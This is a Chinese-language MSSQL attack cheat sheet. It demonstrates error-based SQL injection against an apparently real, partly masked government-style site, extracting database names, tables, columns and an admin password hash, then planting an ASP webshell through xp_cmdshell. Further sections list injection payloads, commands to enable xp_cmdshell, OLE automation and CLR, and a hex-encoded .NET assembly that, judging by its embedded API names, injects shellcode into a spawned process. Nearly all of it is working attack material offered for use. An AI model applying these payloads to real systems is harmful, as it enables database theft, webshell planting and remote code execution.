mssql

mssql

参考连接 https://www.cnblogs.com/shellr00t/p/5310187.html

https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/

1.报错注入：

【1】首先爆版本：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0

报错信息：在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)
' 转换成数据类型 int 时失败。

原因：＠＠version是mssql 的全局变量，如果我们把它写成这样 and @@version>0 那个后面的mssql就会强行把@@version 强行转换成数字，但是失败，所以就会将数据库信息暴露出来
同样：通过
@@SERVERNAME：爆计算机名称

【2】：爆当前数据库名：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()>0

报错信息：在将 nvarchar 值 'kaifeng' 转换成数据类型 int 时失败。

【3】当前用户：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0

报错信息：在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
Ps：如果看到dbo 那么多半当前数据库的用户是dba权限

【4】爆其他数据库:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0

报错信息：在将 nvarchar 值 'master' 转换成数据类型 int 时失败。
再爆其他的数据库则这么写：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
继续的话要这么写：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0

【5】爆表则：

http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [数据库名字].sys.all_objects where type='U' AND is_ms_shipped=0)>0
例子：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0
报错信息:在将 nvarchar 值 'FRIENDLINK' 转换成数据类型 int 时失败。
再爆其他表：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0
在继续：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0

【6】爆字段则：http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0

例如：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
报错信息：在将 nvarchar 值 'ID' 转换成数据类型 int 时失败。
再爆其他字段：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0
再继续：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0

【7】爆数据：

http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 字段 from 数据库名.表名)>0
例子：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0
报错信息：在将 nvarchar 值 'B5A1EF8730200F93E50F4F5DEBBCAC0B' 转换成数据类型 int 时失败。

如果数据的权限是dba，且知道网站路径的话，那么我们就可以用这个语句来写一句话小马进去：
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--

原理是sql server 支持堆叠查询，利用xp_cmdshell 可以执行cmd指令,cmd指令中用【echo 内容 > 文件】 可以写文件到磁盘里面

基础记录

报错注入

';waitfor delay '0:0:5';--


?Id=admin' and 1=convert(int,(sql语句)) AND 'CvNI'='CvNI

################################################ 数据库信息获取 ##########################################################
1=convert(int,(db_name()))  #获取当前数据库名
1=convert(int,(@@version))  #获取数据库版本
1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH(''))) #一次性获取全部数据库
1=convert(int,(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH('')))  #一次性获取全部数据库

################################################ USER信息 ##########################################################
and 1=(select IS_SRVROLEMEMBER('db_owner')) #查看是否为db_owner权限、sysadmin、public （未测试成功）如果正确则正常，否则报错
1=convert(int,(user)) #查看连接数据库的用户
admin' AND 1878=CONVERT(INT,(SELECT SUBSTRING((CASE WHEN(IS_SRVROLEMEMBER('db_owner')=1)THEN '1' ELSE '0' END),1,100)))  AND 'iaQQ'='iaQQ #来自sqlmap 也为测试成功。

################################################ 获取表名 ##########################################################
获取所有表名
1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('V_XG_BZKS_SHSJHD','HH_HeartHealthRefer_Web'))) #将报出来的表名填入 table_name not in的元组

获取指定数据库的表名
1=convert(int,(select top 1 quotename(name) from [数据库名]..sysobjects where name not in('table_name1','table_name2') and xtype='U') #逐条获取表名，将报出来的表名放入tuple
1=convert(int,(select quotename(name) from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))) #一次性获取表名，如果表很多的话会失败。
1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog=[数据库名] and table_name not in('V_XG_BZKS_SHSJHD','HH_HeartHealthRefer_Web'))) #将报出来的表名填入 table_name not in的元组

################################################ 获取列名 ##########################################################
获取注入点的表中的列名
having 1=1 --
group by column_name1,column_name2 having 1=1--

获取任意表中的列名
1=convert(int,(select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='table_name') FOR XML PATH(''))) #一次性列出该表所有的列名，列名比较少，建议用这个

################################################ 爆数据 ##########################################################
1=(select top 1 * from [数据库名]..[表名] FOR XML PATH(‘’))

命令执行

xp_cmdshell

前提条件：
Mssql数据库服务未降权
已获取到数据库密码

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'                                     # 判断xp_cmdshell状态   存在即返回1

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;              # 启用xp_cmdshell

exec master..xp_cmdshell 'nslookup 8.8.8.8'                                                                           # 利用xp_cmdshell执行命令

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'                                                    # 我们可以利用xplog70.dll恢复被删除的xp_cmdshell

COM组件利用,利用SP_OACREATE执行命令

前提条件：
Mssql数据库服务未降权
已获取到数据库密码

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'                                    # 判断SP_OACREATE状态   存在即返回1

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;          # 启用SP_OACREATE

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'         # 执行命令

clr执行命令

exec sp_configure 'clr enabled', 1;RECONFIGURE;                   # 启用CLR集成
ALTER DATABASE master SET TRUSTWORTHY ON;

use master;
if exists(select * from master.sys.all_objects where name='runcode') drop function runcode;
if exists(select * from master.sys.assemblies where name = 'kindman') drop assembly kindman;
CREATE ASSEMBLY [kindman] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006fe1e78f0000000000000000e00022200b013000000e00000006000000000000822d00000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000002f2d00004f000000004000006803000000000000000000000000000000000000006000000c0000009c2c0000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000880d000000200000000e000000020000000000000000000000000000200000602e7273726300000068030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000632d0000000000004800000002000500bc210000e00a000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b300a003a010000010000111207fe15030000021207167d1100000411070a1208fe150200000211080b720100007072190000707e0f00000a7e0f00000a17167e0f00000a141200120128050000062d117223000070281000000a1309dde100000002281100000a0c16088e6920001000001f4028020000060d081609088e69281200000a166a1304077b0100000416088e6920001000001f4028030000061305077b01000004110509088e696a120428080000062d1d09088e6920001000002804000006267251000070281000000a1309de6f09088e692000100000280400000626161306077b010000047e0f00000a166a11057e0f00000a161206280600000626077b01000004280700000626077b0200000428070000062672950000701206281300000a281400000a281000000a1309de0e6f1500000a281000000a1309de0011092a0000411c0000000000000000000029010000290100000e000000130000011e02281600000a2a42534a4201000100000000000c00000076342e302e33303331390000000005006c00000050040000237e0000bc040000e403000023537472696e677300000000a0080000ac000000235553004c0900001000000023475549440000005c0900008401000023426c6f620000000000000002000001571502140900000000fa013300160000010000001800000004000000160000000900000024000000160000000e00000001000000030000000700000001000000020000000000b7020100000000000600b201390306001f0239030600e60007030f005903000006000e01ca0206009501ca0206007601ca0206000602ca020600d201ca020600eb01ca0206002501ca020600fa001a030600d8001a0306005901ca02060040014d020600c900c30206009b03c3020a00780268030600dc02c30206000003c3020600b303c302060095021a0306000d00c30206008402c302000000002c00000000000100010009011000350000004100010001000901100038000000410005000100010010003b00000045001700010006008b022d0006008e022d0006008c00580006009000580006005a005800060001005b00060014005b00060017005b0006004300580006004700580006001a00580006001d005800060020005800060023005800060026005800060029005800060057005e00060066005e00060076002d00060094002d0006003d022d0006004a022d00502000000000960097003000010000000000800091206900610002000000000080009120bb03690006000000000080009120a50072000b0000000000800091207d0379000e00000000008000912079008b0018000000000080009120bd0097001f000000000080009120cf039c002000b421000000008618fa0206002500000001009f0000000100ed0200000200410200000300d30000000400ae0300000100eb0200000200ed0200000300410200000400d30000000500ae0300000100ed0200000200410200000300d300000001005800000002006700000003007700000004009500000005004402000006004b02000007008902000008008f0200000900910202000a009302000001008b03000002006700000003007700000004009500000005004402000006004b02020007008902000001008f02000001008f0200000200ed020000030046020000040041020200050040020900fa0201001100fa0206001900fa020a002900fa0210003100fa0210003900fa0210004100fa0210004900fa0210005100fa0210005900fa0210006100fa0215006900fa0210007100fa0210007900fa021000a100e6022d009100a2033000a90067023600b100ca033c00b90082024500c100940349009900b10045008900fa0206002e000b00a6002e001300af002e001b00ce002e002300d7002e002b00e4002e003300e4002e003b00e4002e004300d7002e004b00ea002e005300e4002e005b00e4002e00630002012e006b002c012e00730039011a000400aa029d02000105006900010000010700bb03010000010900a500010000010b007d03020000010d007900030000010f00bd00030000011100cf030300048000000100000000000000000000000000f20200000400000000000000000000004f005d00000000000400000000000000000000004f004b00000000000000007631006b65726e656c33320055496e743332007632007633007634007635007636007637007638007639003c4d6f64756c653e005049005349004b696e64434c5200647758006477590053797374656d2e44617461007661006362006d73636f726c6962007662005669727475616c416c6c6f630076630043726561746552656d6f746554687265616400706964007469640076640072756e636f64650073636f6465005669727475616c46726565006765745f4d65737361676500436c6f736548616e646c650056616c756554797065007479706500477569644174747269627574650044656275676761626c6541747472696275746500436f6d56697369626c6541747472696275746500417373656d626c795469746c6541747472696275746500417373656d626c7954726164656d61726b417474726962757465005461726765744672616d65776f726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007665007073697a65006275660076660053797374656d2e52756e74696d652e56657273696f6e696e670046726f6d426173653634537472696e670053716c537472696e6700546f537472696e670070680074680069006a004d61727368616c004b65726e656c33322e646c6c006b65726e656c33322e646c6c006b696e64636c722e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e005a65726f00700061646472006b696e64636c72002e63746f7200496e745074720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e496e7465726f7053657276696365730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053797374656d2e446174612e53716c54797065730043726561746550726f63657373006850726f6365737300436f6e636174004f626a656374006f705f496d706c696369740070726f7400436f6e76657274005669727475616c416c6c6f63457800436f707900577269746550726f636573734d656d6f727900000000176e006f00740065007000610064002e0065007800650000096e0075006c006c00002d630061006e006e006f0074002000720075006e0020006e006f00740065007000610064002e006500780065000043630061006e006e006f00740020007700720069007400650020006e006f00740065007000610064002e006500780065002700730020006d0065006d006f0072007900011373007500630063006500730073003a00200000000000908174cf866e6d4eacba1c7d0541b30f00042001010803200001052001011111042001010e042001010212070a110c11081d05180b1809110c1108114902061805000111490e0500011d050e080004011d050818080320000e0500020e0e0e08b77a5c561934e08902060902060e02060607000418090909090800051818090909090600031818090911000a020e0e18180209180e10110c1011080b00071818180b18180910090400010218090005021818180b100b0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000000c0100076b696e64636c72000005010000000017010012436f7079726967687420c2a920203230323100002901002434636634373166362d653439652d343837322d383635612d32613730366639373466346600000c010007312e302e302e3000004701001a2e4e45544672616d65776f726b2c56657273696f6e3d76342e300100540e144672616d65776f726b446973706c61794e616d65102e4e4554204672616d65776f726b20340000000000000012a8569a00000000020000005b000000d42c0000d40e00000000000000000000000000001000000000000000000000000000000052534453e4610c0c90ccf44c82725ba4085612fc01000000433a5c55736572735c746573745c736f757263655c7265706f735c6b696e64636c725c6b696e64636c725c6f626a5c52656c656173655c6b696e64636c722e70646200572d00000000000000000000712d0000002000000000000000000000000000000000000000000000632d0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c000000000000ff2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000000c03000000000000000000000c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b0046c020000010053007400720069006e006700460069006c00650049006e0066006f0000004802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d0065000000000000000000380008000100460069006c0065004400650073006300720069007000740069006f006e00000000006b0069006e00640063006c0072000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000038000c00010049006e007400650072006e0061006c004e0061006d00650000006b0069006e00640063006c0072002e0064006c006c0000004800120001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a90020002000320030003200310000002a00010001004c006500670061006c00540072006100640065006d00610072006b007300000000000000000040000c0001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000006b0069006e00640063006c0072002e0064006c006c000000300008000100500072006f0064007500630074004e0061006d006500000000006b0069006e00640063006c0072000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000843d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;

declare @x nvarchar(max)='CREATE function runcode (@sc nvarchar(max)) returns nvarchar(max) AS EXTERNAL NAME [kindman].[KindCLR].[runcode]';exec sp_executesql @x;

select master.dbo.runcode('shellcode');